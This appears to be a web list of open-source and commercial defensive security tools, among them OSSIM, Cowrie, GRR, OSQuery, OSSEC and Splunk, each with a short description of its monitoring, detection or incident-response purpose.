• AlienVault OSSIM

    AlienVault-OSSIM is a feature-rich, open-source security information and event management (SIEM) that includes event collection, normalization, and correlation.

  • Cowrie

    Cowrie is a medium interaction SSH and Telnet honeypot designed to log brute force attacks and shell interaction performed by an attacker.

  • FIR

    Fast Incident Response. FIR is an open-source cybersecurity incident management and tracking platform. FIR is designed to help security teams effectively manage and respond to security incidents by providing a collaborative environment for information sharing, analysis, and documentation. It streamlines incident response workflows, enabling organizations to handle security incidents efficiently. 

  • GRR Rapid Response

    GRR Rapid Response: remote live forensics for incident response.

  • Hunting ELK

    The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack

  • LogRhythm

    LogRhythm, Inc. is a global security intelligence company that specializes in Security Information and Event Management (SIEM), log management, network monitoring, user behavior and security analytics.

  • MSTICPy

    Microsoft Threat Intelligence Security Tools. MSTICPy is a set of Python tools intended to be used for security investigations and hunting. Many of the tools originated as code Jupyter notebooks written to solve a problem as part of a security investigation.

  • OSQuery

    OSQuery is an open-source endpoint security tool that allows users to query their operating systems using SQL-like syntax. It provides a unified interface to gather insights into various aspects of system information, logs, and configuration. OSQuery is commonly used for security monitoring, compliance, and investigative purposes across different operating systems, including Linux, macOS, and Windows.

  • OSSEC:HIDS

    OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response.

  • RockNSM

    RockNSM (Rock Security Network Monitoring) is an open-source network security monitoring (NSM) platform designed for detecting and responding to security threats. It includes a set of tools and technologies to monitor network traffic, analyze logs, and aid in incident detection and response. RockNSM is often used by cybersecurity professionals to enhance network visibility and bolster security efforts.

  • ScoutSuite

    Multi-Cloud Security Auditing Tool

  • Splunk

    Splunk is a software platform that searches, analyses and visualizes machine-generated data from various sources.